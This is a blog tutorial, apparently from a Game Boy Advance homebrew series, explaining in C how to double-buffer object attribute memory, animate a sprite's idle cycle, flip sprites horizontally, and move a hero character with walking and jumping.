<p>Since the GBA hardware draws the screen 1 line at a time, it’s possible to modify the object memory for a sprite while it’s being drawn. In some cases this will just mean a bit of tearing (if the sprite is moving), but in the case of animation, it could lead to the top of the sprite being rendered in a different animation frame from the bottom part. Gross! This isn’t really an issue for us today because we aren’t doing enough work for us to leave the VBLANK pause, but it’s worth noting so that we learn to do things right from the get go.</p>
<p>In order to avoid this potential problem, one thing we can do is to create a second buffer of memory, which shadows object memory. Whenever we want to update something about a sprite in our game logic, we modify the data inside our own copy of object memory. Then when we hit the VBlank pause, we copy all the data from our shadow buffer to real object memory. This lets us do whatever we want in our logic, while keeping our sprites looking exactly how they should.</p>
<p>We could define our object-memory shadow buffer like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">ObjectAttributes</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span></code></pre></figure>
<p>Remember that the definition of the ObjectAttributes struct is inside gba.h if you forget what that looks like.</p>
<p>Now we should also add the code to copy data from our backbuffer to the real Object Attribute Memory. For now, I’m just going to copy the first element, because that’s all we need for today. In a real application, you’d probably want to copy the whole thing, or at least larger chunks at a time.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
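<p>For completeness, copying more than one entry could look something like the sketch below. OamEntry is a stand-in for the ObjectAttributes struct (I’m assuming the usual layout of three 16 bit attributes plus a padding slot), and flushObjectBuffer is a hypothetical helper, not something from gba.h.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">// Stand-in for ObjectAttributes from gba.h (layout assumed).
typedef struct
{
    unsigned short attr0;
    unsigned short attr1;
    unsigned short attr2;
    unsigned short pad;
} OamEntry;

// Hypothetical helper: copy the first `count` entries of the shadow buffer
// into object memory. Meant to be called right after vsync().
void flushObjectBuffer(volatile OamEntry* dst, const OamEntry* src, int count)
{
    int i;
    for (i = 0; i < count; i++)
    {
        // Copy field by field so every write is a 16 bit write.
        // The pad slot is skipped on purpose: in real object memory it
        // holds rotation/scaling data that we don't want to clobber.
        dst[i].attr0 = src[i].attr0;
        dst[i].attr1 = src[i].attr1;
        dst[i].attr2 = src[i].attr2;
    }
}</code></pre></figure>
<p>Assuming MEM_OAM points at an array of ObjectAttributes, the single assignment in the loop above would turn into a call along the lines of flushObjectBuffer(MEM_OAM, oam_object_backbuffer, 128).</p>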
<p>Now that that’s set up, let’s actually put something useful into our backbuffer.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span></code></pre></figure>
<p>Which means that, when everything is put together, your main function should look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4000</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>With the sprite set up this way, running the program should yield this:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/firstdraw.png" />
<br />
</div>
<p>Perfect! Now we know our data is in memory correctly! Next let’s get some animations going.</p>
<h2 id="hello-sprite-animation">Hello Sprite Animation</h2>
<p>Before we dig into making our hero run and jump, let’s just get his idle animation cycle running to be sure that things are working how we expect. In the sprite sheet that I provided earlier, the animation cycle is located in the first 4 frames. We want to have our hero cycle through these frames whenever he isn’t moving.</p>
<p>Setting up a single animation like this is really simple, because all we need to do is point attr2 in our sprite attributes to a new place in tile memory. You’ll notice that right now, our sprite is simply stuck on the first frame of his idle animation. This is because we put the sprites into tile memory at the start of the tile block, so the index of the first frame is 0. It stands to reason that updating this should just be a simple add…</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="p">(</span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span><span class="p">;</span></code></pre></figure>
<p>buuut it isn’t! Remember that attr2 is the index of the tile used to render the top-left corner of your sprite. Since our sprite is 2 tiles by 2 tiles, this means that in theory, to advance a whole frame, our attr2 value must increment by 4. In reality, since we are using 8bpp tiles, we have to double that: tile indices always count in 32 byte steps (the size of a 4bpp tile), and each 8bpp tile takes up 64 bytes. So advancing a frame of animation means advancing attr2 by 8, and with 4 frames in the cycle we wrap around at 32. With that in mind, running our idle loop actually requires the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="p">(</span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">%</span> <span class="mi">32</span><span class="p">;</span></code></pre></figure>
<p>With that bit of code added to the update loop, our protagonist should now be happily bouncing in place:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/dude.gif" />
<br />
</div>
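<p>If the magic numbers 8 and 32 feel arbitrary, it can help to spell out where they come from. Here’s a small sketch that does the same arithmetic with named constants; the constant names and idleFrameToTileIndex are made up for this example and aren’t part of gba.h.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">#define TILES_PER_FRAME   4  // a 16x16 sprite is 2x2 tiles
#define SLOTS_PER_TILE    2  // an 8bpp tile spans two 32 byte tile slots
#define IDLE_FRAME_COUNT  4  // the idle cycle is the first 4 frames

// Hypothetical helper: the attr2 tile index for a given idle frame.
int idleFrameToTileIndex(int frame)
{
    return (frame % IDLE_FRAME_COUNT) * TILES_PER_FRAME * SLOTS_PER_TILE;
}</code></pre></figure>
<p>Frames 0 through 3 map to tile indices 0, 8, 16 and 24, and frame 4 wraps back around to 0, which is exactly what adding 8 and taking the result modulo 32 does.</p>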
<p>Alright, with that in mind, let’s move on to actually hooking up some input and getting this guy moving around the screen.</p>
<h2 id="setting-up-input">Setting Up Input</h2>
<p>Just like <a href="http://localhost:4000/blog/tutorial/gba/2017/04/18/GBA-By-Example-4.html">last time</a>, all our input handling code is stored in <a href="https://github.com/khalladay/GBA-By-Example/blob/master/4-SpriteAnimation/code/input.h">input.h</a>, so make sure that you add that to your includes. Once that’s included, just make sure to add a call to key_poll in your main loop, otherwise we’ll never know when the input state changes. If you’re following along, your main loop should look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="p">(</span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">%</span> <span class="mi">32</span><span class="p">;</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
<p>Before we get to actually writing our movement and animation functions, there’s one last bit of theory to get out of the way: there are some new bits in the object attributes attr1 variable that we’re going to need today.</p>
<h2 id="more-details-about-object-attributes">More Details About Object Attributes</h2>
<p>When I last talked about sprites, I presented 3 tables describing which bits in the sprite attribute values corresponded to what. In the interest of simplicity, I left out a lot of details. In this post, we need to fill in one of those details, so here is a more complete description of what attribute 1 does:</p>
<div align="center">
<table style="border:1px solid black; width:600px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854">
<tr class="header">
<th>Attr 1</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Sprite Size (discussed below)</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">D</td>
<td>Vertical Flip </td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">C</td>
<td>Horizontal Flip </td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">BA9</td>
<td>Not Used Today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">8 7654 3210</td>
<td>X coordinate
</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Yes, there’s still some data we don’t need to worry about, but the things to pay attention to here are the bit flags for vertical and horizontal flipping. You may have noticed that our sprites only have our protagonist facing one way; the horizontal flip flag is how we’re going to handle the other direction.</p>
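<p>As a quick illustration of how those flip bits can be toggled, here’s a minimal sketch. The constant names and setHorizontalFlip are hypothetical (they’re not in gba.h as far as this post shows); the bit positions come straight from the table above.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">#define ATTR1_HFLIP 0x1000  // bit C in the table above
#define ATTR1_VFLIP 0x2000  // bit D in the table above

// Hypothetical helper: return attr1 with the horizontal flip bit
// set (flipped != 0) or cleared (flipped == 0). Other bits are untouched.
unsigned short setHorizontalFlip(unsigned short attr1, int flipped)
{
    if (flipped)
    {
        return attr1 | ATTR1_HFLIP;
    }
    return attr1 & ~ATTR1_HFLIP;
}</code></pre></figure>
<p>For example, a sprite with attr1 set to 0x4000 becomes 0x5000 once it’s flipped horizontally, and goes back to 0x4000 when the flip is cleared.</p>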
<h2 id="moving-our-hero">Moving Our Hero</h2>
<p>Let’s tackle moving our hero around the screen next, and finish off with adding support for the rest of our animation frames. To make things easier (and more readable), I’m going to define a struct to hold all the information we need to move and animate our hero. For simplicity’s sake, I’m just going to make all the fields we need ints.</p>
<p>Here’s what my struct and its initialization code look like:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">int</span> <span class="n">FLOOR_Y</span> <span class="o">=</span> <span class="mi">160</span><span class="o">-</span><span class="mi">16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="k">struct</span>
<span class="p">{</span>
<span class="n">ObjectAttributes</span><span class="o">*</span> <span class="n">spriteAttribs</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">facingRight</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">firstAnimCycleFrame</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">animFrame</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">posX</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">posY</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">velX</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">velY</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">framesInAir</span><span class="p">;</span>
<span class="p">}</span><span class="n">HeroSprite</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">InitializeHeroSprite</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">,</span> <span class="n">ObjectAttributes</span><span class="o">*</span> <span class="n">attribs</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="n">attribs</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">=</span> <span class="n">FLOOR_Y</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Nothing too fancy here. Notice, though, that I also defined a constant for the location of the “floor,” which is actually 16 pixels above the bottom of the screen. This is because our hero is 16 pixels tall, and when you set a sprite’s position, you set its top left corner; thus, for simplicity, I’ve defined the floor Y as the location of the top of our hero’s head when he’s standing on the floor.</p>
<p>To handle character movement, I’m going to create another function called updateSpritePosition.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">updateSpritePosition</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">);</span></code></pre></figure>
<p>This function is going to first determine our hero’s velocity for the current frame, and then add those velocities to his position. It will also set up a few other bits of data that we’ll use later when determining what animation frame to display, and translate these struct members into real values inside object attribute memory. To start with though, let’s just deal with user input from the D-pad:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">int</span> <span class="n">WALK_SPEED</span> <span class="o">=</span> <span class="mi">4</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">updateSpritePosition</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_LEFT</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="o">-</span><span class="n">WALK_SPEED</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_RIGHT</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="n">WALK_SPEED</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velX</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">+=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velX</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mi">240</span><span class="o">-</span><span class="mi">16</span><span class="p">,</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posX</span><span class="p">);</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posX</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posX</span><span class="p">);</span></code></pre></figure>
<p>This should all be pretty straightforward. The only bit you may be wondering about is the facingRight flag. We’re going to use this later to handle horizontally flipping our sprites so that we can use one set of sprites but have our hero be able to look and move both left and right. Also note that I’m clamping the x position to keep our sprite on the screen at all times.</p>
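<p>One note on the clamping: min and max aren’t part of the C standard library, so they have to come from somewhere (presumably a header in your project). If you’d rather not depend on them, a tiny clamp function does the same job. This is just a sketch, and clampInt is a name I’ve made up for it.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">// Hypothetical helper: keep value inside the range [lo, hi].
int clampInt(int value, int lo, int hi)
{
    if (value < lo) return lo;
    if (value > hi) return hi;
    return value;
}</code></pre></figure>
<p>With that, the two clamping lines above could be written as a single call: clampInt(sprite->posX, 0, 240-16).</p>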
<p>Next, we need to add support for jumping. Note that if we’re already in the air, we don’t want to jump again, so we’re going to have to take that into account:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">updateSpritePosition</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//previous code omitted for brevity</span>
<span class="kt">int</span> <span class="n">isMidAir</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">!=</span> <span class="n">FLOOR_Y</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">KEY_A</span><span class="p">))</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">isMidAir</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="n">JUMP_VI</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isMidAir</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="n">JUMP_VI</span> <span class="o">+</span> <span class="p">(</span><span class="n">GRAVITY</span> <span class="o">*</span> <span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span><span class="p">);</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">velY</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velY</span><span class="p">);</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">framesInAir</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">+=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">velY</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">posY</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">posY</span><span class="p">,</span> <span class="n">FLOOR_Y</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Hopefully nothing here is surprising. If you haven’t implemented gravity before, you may want to check out <a href="https://www.khanacademy.org/science/physics/one-dimensional-motion/kinematic-formulas/a/what-are-the-kinematic-formulas">this excellent article</a> on Khan Academy about Kinematic equations. Since they’re not the focus of today, that’s all I’m going to say about them here. I’m using the framesInAir variable in place of an actual time calculation for now, which is why it resets whenever a new jump starts.</p>
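<p>To make the velocity calculation a bit more concrete, here it is pulled out into a standalone sketch. The values for JUMP_VI and GRAVITY below are assumptions picked purely for illustration (this post doesn’t show the real ones), and jumpVelocity and MAX_FALL are made-up names. Remember that Y grows downward on the GBA’s screen, so a negative velocity moves our hero up.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c">// Assumed tuning values, for illustration only.
#define JUMP_VI   (-10)  // initial jump velocity (negative is up)
#define GRAVITY   1      // velocity added for every frame spent in the air
#define MAX_FALL  5      // fall speed cap, matching the min(5, ...) above

// Hypothetical helper: vertical velocity after framesInAir frames of a jump.
int jumpVelocity(int framesInAir)
{
    int velY = JUMP_VI + (GRAVITY * framesInAir);
    return velY < MAX_FALL ? velY : MAX_FALL;
}</code></pre></figure>
<p>With these numbers, the hero leaves the ground at -10 pixels per frame, hits the top of his jump 10 frames later when the velocity reaches 0, and never falls faster than 5 pixels per frame.</p>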
<p>None of this code actually moves our sprite, so we need to finish off this function by setting a few key variables:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2000</span> <span class="o">+</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posY</span><span class="p">;</span>
<span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">facingRight</span><span class="o">?</span> <span class="mh">0x4000</span> <span class="o">:</span> <span class="mh">0x5000</span><span class="p">)</span> <span class="o">+</span> <span class="n">sprite</span><span class="o">-></span><span class="n">posX</span><span class="p">;</span></code></pre></figure>
<p>As you can see, because the lowest bits in these flags store positions, it’s enough for us to just add our x and y position to the end of them. You can also see how the facingRight flag corresponds to the value we set in the horizontal flip bit that we talked about earlier.</p>
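<p>Adding the position straight onto the flags works as long as the position stays in range. A slightly more defensive sketch masks the position first so it can never spill into the flag bits. The macro and function names here are hypothetical; the bit positions (Y in the low 8 bits of attr0, X in the low 9 bits of attr1, horizontal flip at 0x1000) match the values used above.</p>

```c
#include <stdint.h>

/* Hypothetical names for the bits used in the snippet above. */
#define ATTR0_Y_MASK  0x00FF /* attr0: Y position lives in bits 0-7  */
#define ATTR0_8BPP    0x2000 /* attr0: 8bpp colour mode              */
#define ATTR1_X_MASK  0x01FF /* attr1: X position lives in bits 0-8  */
#define ATTR1_HFLIP   0x1000 /* attr1: horizontal flip               */
#define ATTR1_SIZE_16 0x4000 /* attr1: size bits used for our sprite */

uint16_t packAttr0(int posY)
{
    /* Mask the position so it cannot overwrite the flag bits. */
    return (uint16_t)(ATTR0_8BPP | (posY & ATTR0_Y_MASK));
}

uint16_t packAttr1(int posX, int facingRight)
{
    uint16_t flags = ATTR1_SIZE_16;
    if (!facingRight)
    {
        flags |= ATTR1_HFLIP; /* 0x4000 | 0x1000 == 0x5000, as above */
    }
    return (uint16_t)(flags | (posX & ATTR1_X_MASK));
}
```

<p>For in-range positions this produces exactly the same values as the addition above, so it is a drop-in alternative rather than a change in behaviour.</p>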
<p>Now we need to add a call to this function to main:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">charspritesTiles</span><span class="p">,</span> <span class="n">charspritesTilesLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">charspritesPal</span><span class="p">,</span> <span class="n">charspritesPalLen</span><span class="p">);</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="n">HeroSprite</span> <span class="n">sprite</span><span class="p">;</span>
<span class="n">InitializeHeroSprite</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">,</span> <span class="o">&</span><span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">updateSpritePosition</span><span class="p">(</span><span class="o">&</span><span class="n">sprite</span><span class="p">);</span>
<span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">oam_object_backbuffer</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And with that, you should be able to move your sprite around using the dpad and A button to jump. He just won’t be animating yet:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/movingnoanim.gif" style="width:240px;height:160px" />
<br />
</div>
<h2 id="our-animation-function">Our Animation function</h2>
<p>As the heading suggests, we’re going to be writing one more function today, which is going to implement our animation:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">tickSpriteAnimation</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">);</span></code></pre></figure>
<p>We’re going to be choosing the tile to point our attr2 variable at by setting two separate values, the firstAnimCycleFrame and animFrame values in our HeroSprite struct:</p>
<ul>
<li><em>firstAnimCycleFrame</em> will hold the index to the first frame in that animation cycle. Our idle animation cycle is 4 frames long and starts at index 0, so for the idle animation cycle, this will be set to 0</li>
<li><em>animFrame</em> will hold the current frame of animation we are at in our animation cycle. If we want the third frame of an animation, this would be set to two (since frames are zero indexed)</li>
</ul>
<p>Knowing that, it’s probably useful for us to take another look at our sprite sheet, and figure out where our idle, run, and jump cycles start in the sheet. I’ve outlined them below:</p>
<div align="center">
<img src="/images/post_images/2017-06-07/charsprites_highlighted.bmp" />
<br />
</div>
<p>So that puts our idle cycle starting at index 0, our run cycle at index 4, and our jump cycle at index 7. Given that we use 4 tiles per sprite, and have 8bpp tiles, this means that the real indices we need are:</p>
<ul>
<li>Idle starts at 0</li>
<li>Run starts at 32</li>
<li>Jump starts at 56</li>
</ul>
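<p>The arithmetic behind those numbers can be sketched as a tiny helper. The names are hypothetical; the two factors come from the text above: 4 tiles per sprite, and each 8bpp tile taking up two tile index slots.</p>

```c
#define TILES_PER_SPRITE     4 /* each sprite frame is made of 4 tiles */
#define SLOTS_PER_8BPP_TILE  2 /* an 8bpp tile spans two index slots   */

/* Convert "nth sprite in the sheet" into the tile index it starts at. */
int firstTileIndex(int spriteNumber)
{
    return spriteNumber * TILES_PER_SPRITE * SLOTS_PER_8BPP_TILE;
}
```

<p>Sprite 0 (idle) maps to 0, sprite 4 (run) to 32, and sprite 7 (jump) to 56.</p>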
<p>Let’s start off by just writing the first and last line of our function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">tickSpriteAnimation</span><span class="p">(</span><span class="n">HeroSprite</span><span class="o">*</span> <span class="n">sprite</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">ObjectAttributes</span><span class="o">*</span> <span class="n">spriteAttribs</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">spriteAttribs</span><span class="p">;</span>
<span class="c1">//set firstAnimCycleFrame and animFrame in code here</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="n">sprite</span><span class="o">-></span><span class="n">firstAnimCycleFrame</span> <span class="o">+</span> <span class="p">(</span><span class="n">sprite</span><span class="o">-></span><span class="n">animFrame</span> <span class="o">*</span> <span class="mi">8</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
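<p>This is just to give you an idea of how this function works. We multiply animFrame by 8 because each frame is 4 tiles, and each 8bpp tile takes up two tile indices. Note that if you were using 4bpp sprites, you would only need to multiply animFrame by 4.</p>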
